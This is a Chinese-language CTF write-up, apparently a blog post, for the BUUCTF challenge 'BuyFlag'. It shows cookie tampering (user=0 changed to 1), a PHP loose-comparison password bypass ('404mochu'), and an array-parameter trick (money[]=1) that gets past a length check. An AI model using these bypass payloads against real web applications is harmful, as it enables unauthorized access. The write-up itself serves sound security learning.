题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BuyFlag
![BUUCTF:[极客大挑战 2019]BuyFlag_php](https://s2.51cto.com/images/blog/202306/19154656_649007f08c91244670.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]BuyFlag_php_02](https://s2.51cto.com/images/blog/202306/19154656_649007f0a38f258118.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
源代码中发现注释
![BUUCTF:[极客大挑战 2019]BuyFlag_PHP_03](https://s2.51cto.com/images/blog/202306/19154656_649007f0bb96a78279.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[极客大挑战 2019]BuyFlag_PHP_04](https://s2.51cto.com/images/blog/202306/19154656_649007f0d08c746887.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
cookie中发现user=0,当修改user=1时页面发生变化
![BUUCTF:[极客大挑战 2019]BuyFlag_php_05](https://s2.51cto.com/images/blog/202306/19154656_649007f0eb55b98880.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
if (isset($_POST['password'])) {
$password = $_POST['password'];
if (is_numeric($password)) {
echo "password can't be number</br>";
}elseif ($password == 404) {
echo "Password Right!</br>";
}
}php弱类型比较
PS C:\Users\Administrator> php -r "var_dump('404'==404);"
bool(true)
PS C:\Users\Administrator> php -r "var_dump(is_numeric('404'));"
bool(true)
PS C:\Users\Administrator> php -r "var_dump(is_numeric('404mochu'));"
bool(false)
PS C:\Users\Administrator> php -r "var_dump(404 == '404mochu');"
bool(true)![BUUCTF:[极客大挑战 2019]BuyFlag_弱类型_06](https://s2.51cto.com/images/blog/202306/19154657_649007f10e44699397.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
money值太长?这里应该是对字符进行了判断,当前PHP版本为PHP/5.3.3,对字符处理的函数在PHP漏洞中非常常见,使用数组进行传参发现即可跳过判断
money[]=1&password=404mochu![BUUCTF:[极客大挑战 2019]BuyFlag_PHP_07](https://s2.51cto.com/images/blog/202306/19154657_649007f1294867805.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
